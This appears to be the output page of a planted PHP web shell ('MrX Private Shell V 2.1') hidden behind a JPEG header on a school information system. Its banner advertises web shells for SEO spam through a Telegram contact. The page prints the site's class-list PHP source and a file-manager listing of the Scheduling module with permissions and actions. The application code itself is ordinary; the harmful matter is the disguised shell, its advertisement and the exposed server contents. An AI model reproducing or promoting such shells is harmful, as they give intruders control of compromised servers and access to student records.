����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
require_once 'modules/Scheduling/includes/ClassSearchWidget.fnc.php';
if ( $_REQUEST['modfunc'] === 'save' )
{
if ( empty( $_REQUEST['cp_arr'] ) )
{
BackPrompt( _( 'You must choose at least one course period.' ) );
}
$cp_list = implode( ',', array_map( 'intval', $_REQUEST['cp_arr'] ) );
$extra['DATE'] = DBGetOne( "SELECT min(SCHOOL_DATE) AS START_DATE
FROM attendance_calendar
WHERE SYEAR='" . UserSyear() . "'
AND SCHOOL_ID='" . UserSchool() . "'" );
if ( ! $extra['DATE']
|| DBDate() > $extra['DATE'] )
{
$extra['DATE'] = DBDate();
}
// Multiple school periods for a course period.
// Add subject areas.
$course_periods_RET = DBGet( "SELECT cp.TITLE,cp.COURSE_PERIOD_ID,cp.TITLE,
cp.MARKING_PERIOD_ID,cp.MP,c.TITLE AS COURSE_TITLE,cp.TEACHER_ID,
(SELECT " . DisplayNameSQL() . " FROM staff WHERE STAFF_ID=cp.TEACHER_ID) AS TEACHER
FROM course_periods cp,courses c
WHERE c.COURSE_ID=cp.COURSE_ID
AND cp.COURSE_PERIOD_ID IN (" . $cp_list . ")
ORDER BY TEACHER" );
$first_extra = $extra;
$handle = PDFStart();
$PCL_UserCoursePeriod = UserCoursePeriod(); // Save/restore for teachers.
$is_include_inactive = isset( $_REQUEST['include_inactive'] ) && $_REQUEST['include_inactive'] === 'Y';
$no_students_backprompt = true;
foreach ( (array) $course_periods_RET as $teacher_id => $course_period )
{
// Do NOT use SetUserCoursePeriod() here (even only for teachers) as CP may be in another Semester, Quarter, etc.
$_SESSION['UserCoursePeriod'] = $course_period['COURSE_PERIOD_ID'];
$extra = [
'SELECT_ONLY' => '1',
'WHERE' => '',
];
if ( User( 'PROFILE' ) === 'teacher' )
{
// Prevent course period ID hacking.
$extra['WHERE'] .= " AND '" . User( 'STAFF_ID' ) . "'=(SELECT TEACHER_ID FROM course_periods WHERE COURSE_PERIOD_ID='" . UserCoursePeriod() . "')";
}
$extra['WHERE'] .= " AND s.STUDENT_ID IN
(SELECT STUDENT_ID
FROM schedule
WHERE COURSE_PERIOD_ID='" . (int) $course_period['COURSE_PERIOD_ID'] . "'";
if ( $is_include_inactive )
{
// Include Inactive Students.
$extra['WHERE'] .= ")";
}
else
{
// Active / Scheduled Students.
$extra['WHERE'] .= " AND '" . DBDate() . "'>=START_DATE
AND ('" . DBDate() . "'<=END_DATE OR END_DATE IS NULL)
AND MARKING_PERIOD_ID IN (" . GetAllMP( 'QTR', UserMP() ) . "))";
}
$extra_where = $extra['WHERE'];
$RET = GetStuList( $extra );
//echo '<pre>'; var_dump($RET); echo '</pre>';
if ( ! empty( $RET ) )
{
$no_students_backprompt = false;
unset( $_ROSARIO['DrawHeader'] );
DrawHeader( _( 'Class List' ) );
DrawHeader( $course_period['COURSE_TITLE'], $course_period['TITLE'] );
DrawHeader( SchoolInfo( 'TITLE' ), ProperDate( DBDate() ) );
$extra = $first_extra;
$extra['MP'] = $course_period['MARKING_PERIOD_ID'];
$extra['MPTable'] = $course_period['MP'];
$extra['suppress_save'] = true;
$extra['WHERE'] = issetVal( $extra['WHERE'], '' );
$extra['WHERE'] .= $extra_where;
// Warning: do NOT use require_once for Export here!
require 'modules/misc/Export.php';
echo '<div style="page-break-after: always;"></div>';
}
}
// Do NOT use SetUserCoursePeriod() here (even only for teachers) as CP may be in another Semester, Quarter, etc.
$_SESSION['UserCoursePeriod'] = $PCL_UserCoursePeriod;
if ( $no_students_backprompt )
{
BackPrompt( _( 'No Students were found.' ) );
}
PDFStop( $handle );
}
if ( ! $_REQUEST['modfunc']
|| $_REQUEST['modfunc'] === 'list' )
{
DrawHeader( ProgramTitle() );
if ( User( 'PROFILE' ) !== 'admin' )
{
$_REQUEST['modfunc'] = 'list';
}
if ( $_REQUEST['modfunc'] === 'list' )
{
echo '<form action="' . URLEscape( 'Modules.php?modname=' . $_REQUEST['modname'] . '&modfunc=save&search_modfunc=list&_ROSARIO_PDF=true' .
issetVal( $extra['action'], '' ) ) . '" method="POST" name="search">';
$submit_button = Buttons( _( 'Create Class Lists for Selected Course Periods' ) );
DrawHeader(
'<label><input type="checkbox" name="include_inactive" value="Y" /> ' .
_( 'Include Inactive Students' ) . '</label>',
$submit_button
);
$Search = 'ClassSearchWidget';
require_once 'modules/misc/Export.php';
echo '<br style="clear: both;" /><div class="center">' . $submit_button . '</div>';
echo '</form>';
}
else
{
ClassSearchWidget( '' );
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| includes | Folder | 0755 |
|
|
| AddDrop.php | File | 2.52 KB | 0644 |
|
| Courses.php | File | 52.23 KB | 0644 |
|
| IncompleteSchedules.php | File | 4.17 KB | 0644 |
|
| MassDrops.php | File | 9.03 KB | 0644 |
|
| MassRequests.php | File | 6.37 KB | 0644 |
|
| MassSchedule.php | File | 8.22 KB | 0644 |
|
| Menu.php | File | 2.4 KB | 0644 |
|
| PrintClassLists.php | File | 4.24 KB | 0644 |
|
| PrintClassPictures.php | File | 8.54 KB | 0644 |
|
| PrintRequests.php | File | 3.64 KB | 0644 |
|
| PrintSchedules.php | File | 14.09 KB | 0644 |
|
| Requests.php | File | 9.52 KB | 0644 |
|
| RequestsReport.php | File | 842 B | 0644 |
|
| Schedule.php | File | 27.21 KB | 0644 |
|
| ScheduleReport.php | File | 1.13 KB | 0644 |
|
| Scheduler.php | File | 20.4 KB | 0644 |
|
| functions.inc.php | File | 2.69 KB | 0644 |
|
| new_Requests.php | File | 2.28 KB | 0644 |
|